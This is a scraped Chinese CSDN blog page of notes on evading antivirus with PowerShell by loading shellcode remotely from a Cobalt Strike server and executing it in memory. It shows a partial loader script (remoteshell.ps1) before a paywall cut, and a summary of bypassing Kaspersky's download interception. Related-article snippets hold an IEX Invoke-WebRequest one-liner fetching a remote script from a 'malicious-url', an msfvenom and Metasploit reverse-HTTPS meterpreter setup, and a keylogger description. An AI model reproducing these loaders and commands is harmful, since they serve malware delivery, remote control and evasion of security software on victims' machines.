Powershell免杀(远程加载shellcode)笔记

最新推荐文章于 2024-08-20 22:22:11 发布
最新推荐文章于 2024-08-20 22:22:11 发布
阅读量2.2k 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jackslowf/article/details/106940129
版权
本文介绍了如何使用PowerShell进行免杀的远程加载shellcode操作。通过将恶意代码存放在远程服务器,然后利用PowerShell从URI读取字节数组并在内存中执行,以此避开安全软件的检测。同时,文中提到了如何在出网限制下,通过特定方法绕过卡巴斯基对`downloadstring`的拦截,以及如何在不出网的情况下,从本地bin文件中读取字节数组来实现相同目的。
摘要由CSDN通过智能技术生成

原文链接

远程加载的思路很简单,只需要将bin文件放到cs服务器上,利用远程读取shellcode的方式将恶意代码加载到内存执行即可。

下面代码直接从uri读取字节数组(对的,没仔细看)

# remoteshell.ps1

Set-StrictMode -Version 2

function get_delegate_type {
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
        [Parameter(Position = 1)] [Type] $var_return_type = [Void]
    )

    $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
    $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
    $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

    return $var_type_builder.CreateType()
}


function get_proc_address {
    Param ($var_module, $var_procedure)     
    $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
    $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
    return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleR
最低0.47元/天 解锁文章
jackslowf
关注
Ladon for PowerShell远程加载教程
K8哥哥
08-08 733
前言 本文仅是PowerLadon远程加载例子,并不代表只有这些功能。详情参考完整文档 脚本可直接远程内存加载使用无须免杀,或者有些人比较喜欢的所谓无文件渗透 完整文档:http://k8gege.org/Ladon 架设WEB服务器 使用命令 Ladon web 800 架设一个WEB服务器,用于远程下载脚本 实战可架设在VPS,或者架设在目标内网机器(因为有机器不能出网) 将脚本放在WEB目录下即可,当然大家也可以用IIS或APACHE搭建WEB 远程加载MS17010漏洞扫描 powershell
Win32下ShellCode远程加载
CSDN
05-28 4974
如下Python代码是一个基本的键盘记录器,它使用了一些Windows API函数和第三方库来监视键盘活动,并记录按键、窗口切换和剪贴板操作。然后,它检测按键是否为常规按键,如果是,则输出按键字符。如果按下的是Ctrl+V,它会尝试获取剪贴板的内容并输出。函数是一个回调函数,用于处理键盘事件。它首先检测是否切换了窗口,如果切换了窗口,就调用。最后,它输出进程相关的信息。接下来,代码定义了一些全局变量和函数,包括。函数用于获取当前前台窗口的进程信息,以及。首先,代码导入了一些必要的库,包括。
powershell免杀详解
最新发布
m0_57836225的博客
08-20 906
也可以使用 `IEX (Invoke-WebRequest -Uri 'http://malicious-url/script.txt' -UseBasicParsing).Content`,通过 `Invoke-WebRequest`获取远程脚本内容并执行。- 解释:PowerShell 模块是一种组织和封装 PowerShell 代码的方式,`.psm1`文件包含函数、变量、别名等,可以将一组相关的功能打包在一起,以便在多个脚本中重复使用,提高代码的可维护性和可重用性。
网络安全-powershell:powersploit Invoke-shellcode
u013930899的博客
05-06 2014
一、直接执行ShellCode反弹Meterpreter Shell 1. 设置msf Msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_https (一定要选择对应的位数,x64) set LHOST 192.168.101.46 set LPORT 4444 Run 2. 生成powershell脚本木马 msfvenom -p windows/x6.
SimpleShellcode:利用图片隐写术来远程动态加载shellcode
05-27
0x01 前言 将Shellcode隐写到正常BMP图片中,把字符串拆成字节,写入每个像素的alpha通道中,然后上传到可信任的网站下偏移拼接shellcode进行远程动态加载,能有效地增加了免杀性和隐匿性。 0x02 参考链接
探秘安全领域:图片隐写式远程Shellcode加载
gitblog_00043的博客
06-03 295
探秘安全领域:图片隐写式远程Shellcode加载器 项目地址:https://gitcode.com/TryGOTry/go-shellcode-webimg-load 在这个数字化的时代,网络安全的重要性不言而喻。今天,我们要向您推荐一款独特的开源工具——一个基于图片隐写的远程Shellcode加载器,无需文件落地,确保隐蔽性的同时,提供了一种新的攻击防御挑战。 项目介绍 该项目是一个创新的安...
加载shellcode到32位Windows程序远程进程中
微码信息
11-16 231
BOOL WINAPI LoadDll(HANDLE hProcess,LPVOID lpBuf,int cbBuf) { BOOL br = FALSE; LPVOID m_lpData = VirtualAllocEx(hProcess, NULL,cbBuf,MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (m_lpData==NULL) { goto cleanup0; } if(!WriteProcessMemory(hProcess,
红队系列-shellcode AV bypass Evasion免杀合集
aming小老弟
11-13 1461
壳就是软件所增加的保护,并不会破坏里面的程序结构,当我们运行这个加壳的程序时,系统首先会运行程序里的壳,然后由壳将加密的程序逐步还原到内存中,最后运行程序。加壳虽然对于特征码绕过有非常好的效果,加密壳基本上可以把特征码全部掩盖,但是缺点也非常的明显,因为壳自己也有特征,主流的壳如VMP, Themida等等。客户端上传特征,在云端无法检测到,则上传文件,文件通过杀软系统进行评判,得出总评分,对于无结果的,进行鉴定系统评分,总共得出结果返回给用户,并入云端库。比如可以远程读取png中的shellcode
实训周笔记
m0_67370064的博客
04-07 266
PowerShell简介 常用的PowerShell攻击工具: PowerSploit Nishang PowerCat PowerShell是一种基于任务的命令行解释器和脚本环境,可以说是一种强大的shell,如同linux的bash,专为系统管理员而设计,以.NET框架为平台,Windows PowerShell帮助IT专业人员和超级用户控制和自动化管理Windows操作系统和运行在操作系统上的应用。现被更广泛用于渗透测试等方面,在不需要写入磁盘的情况下执行命令,也可以逃避Anti-Viru..
实训笔记2.0
qq_65745696的博客
03-24 861
CSRF漏洞介绍 CSRF (Cross--site request forgery,跨站请求伪造))也被称为 One Click Attack 或者 Session Riding,通常缩写为 CSRF 或者 XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与 XSS 非常不同,XSS 利用站点内的信任用户,而 CSRF 则通过伪装成受信任用户请求受信任的网站。与 XSS 攻击相比,CSRF 攻击往往不大流行(因此对其进行防范的资源也相当稀少)也难以防范,所以被认为比 XSS 更具危
juiced:生成通过PowerShell.NET在内存中执行shellcode的自定义有效负载
04-28
榨汁-最新版本为v1.8 Ruby脚本可将基于Matthew Graebers PowerShell Attacks(史诗般的帖子)和TrustedSec的修改结果输出到各种有效载荷格式中。 工具功能:该脚本将在Msfvenom格式化相应的选项,它发出的有效载荷(ie.windows/meterpreter/reverse_https)到msfvenom,修改接收到的shellcode,并且指定的负载类型中嵌入它。 当前的有效载荷格式:宏=散出功能齐全的复制/粘贴单词宏jar =将发布powershell语法的可执行jar文件* vbs =将发布powershell语法的可执行vbs文件* js =将执行powershell语法的可执行js文件发出powershell语法* ps =可以粘贴到命令提示符中的实际复制/可粘贴命令war =发出powershell语法的war文件* as
PowerSploit 之 Invoke-ShellCode
weixin_46104215的博客
11-08 1622
Shellcode为16进制的机器码,根据不同的任务可能是发出一条系统调用或建立一个高权限的ShellShellcode也就由此得名。它的最终目的是取得目标机器的控制权。(一段用于利用软件漏洞而执行的代码) 反向连接的shellcode: 当目标计算机在防火墙后时,防火墙不允许外边的计算机主动访问目标机器。所以即使采用shellcode建立了服务后门,还是不能与目标计算机建立连接。反向连接的含义就是,让目标计算机通过特定的IP(攻击者的)和端口反向连接到攻击者,也可以设定为在固定的时间段主动来建立连接.
笔记ShellCode 远程线程注入
喜欢唱,rap,篮球的程序员
09-19 563
什么是进程,什么是线程进程就是4GB的空间,线程就是EIP。
c++调用powershell_从ShellCode启动PowerShell后门
weixin_39592137的博客
10-21 700
当您需要在受害者的计算机上执行恶意操作时,Internet上充满了可以重复使用,分叉或稍作更改以满足您要求的资源。毕竟,如果一些代码可以在GitHub上免费获得,为什么还要重新发明轮子呢?如果您有充分的理由开发了一些攻击性工具(因为您是一个彭特,是一个只从事研究工作的红色团队),那么很可能会重用您的代码。这是一个在野外发现的实际例子。初始PowerShell脚本的VT分数为8/59(SH...
免杀简述2(二次编译shellcode\远程加载shellcode\shellcode远程线程注入\内存申请优化\管道技术)
热门推荐
Shanfenglan's blog
08-09 33万+
二次编译 也可以理解成shellcode混淆,将shellcode执行前进行各种加密,然后执行的时候进行解密。Xor就是一个例子。原理是先将加密后的shellcode写入程序中,然后再在程序里面写入shellcode解密程序,这样子将shellcode混淆后,特征码等各种数值就会改变,可以绕过大部分的静态查杀,加密方法不限制,自己写也是可以的。Exp:xor加密shellcode代码: #include stdio.h #define KEY 0x97 //进行异或的字符unsigned char
使用Powershell 远程执行
布谷鸟
03-03 3870
使用Powershell 远程执行
C/C++ 远程ShellCode执行工具
CSDN
07-21 1万+
通过开发一组远程代码执行盒,可以动态实现对ShellCode代码的动态载入,由于ShellCode不存放在本地客户端常量区,所以在一定程度上可以减少被杀概率,客户端只保留之基本的Socket通信功能,当需要时才会加载恶意代码运行。此工具分为服务端与客户端,客户端可以将其加入到开机自启动列表,并传入响应的参数即可,目前支持TCP/UDP/HTTP三种协议传输,后期可能会增加ICMP等来实现后门的传输工作。
动态加载 ShellCode绕过杀软
CSDN
08-11 5117
反病毒解决方案用于检测恶意文件,并且通常使用静态分析技术来区分二进制文件的好坏。如果是恶意文件本身包含恶意内容(ShellCode),那么依靠静态分析技术会非常有效,但如果攻击者使用轻量级的stager来代替下载并将代码加载到内存中,会发生什么?事实证明这样做可以绕过大多数杀软的查杀。虽然这种绕过方法并不是新鲜技术,但绕过反病毒软件对于大多数后门来说都是必要的,在这篇文章中,我们将使用virscan作为我们的检测工具,并使用Metasploit生成一些反向的ShellCode作为我们的攻击载荷。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值